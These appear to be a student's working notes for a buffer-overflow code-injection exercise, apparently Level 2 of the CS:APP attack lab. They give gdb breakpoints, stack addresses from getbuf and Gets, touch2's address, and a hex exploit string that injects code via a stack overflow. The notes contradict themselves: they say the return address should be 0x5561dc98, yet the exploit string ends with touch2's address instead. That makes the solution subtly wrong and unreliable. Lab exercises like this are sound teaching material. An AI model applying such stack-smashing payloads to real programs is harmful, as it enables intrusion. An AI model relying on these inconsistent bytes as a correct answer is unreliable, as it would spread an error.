=================Level 2===============================
00000000004017a8 <getbuf>
0000000000401968 <test>:
break points
test:
break points                                %rsp            
(1)*0x401971(before call to getbuf)        0x5561dca8
(2)*0x401976(after call to getbuf)         0x5561dca8
getbuf
(3)*0x4017a8(first inst of getbuf)         0x5561dca0 (location where return address is stored)
(4)*0x4017ac(after allocating buf)         0x5561dc78 (start address of %rsp in getbuf)
(5)*0x4017b4(after call to Gets)           0x5561dc78
(6)*0x4017bd(just before retq)             0x5561dca0
Gets
(7)*0x401a40(first inst of Gets)           0x5561dc70
(8)*0x401a91(last inst of Gets)            0x5561dc70
Order in which breakpoints will encounter
1-3-4-7-8-5-6-2
So accessable stack addresses for our code injection is
0x5561dc98-0x5561dc78
so value to be stored as return address 0x000000005561dc98
address of touch2: 0x00000000004017ec 

exploit string
68 ec 17 40 00 bf fa 97
b9 59 c3 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ec 17 40 00 00 00 00 00
=======================================================
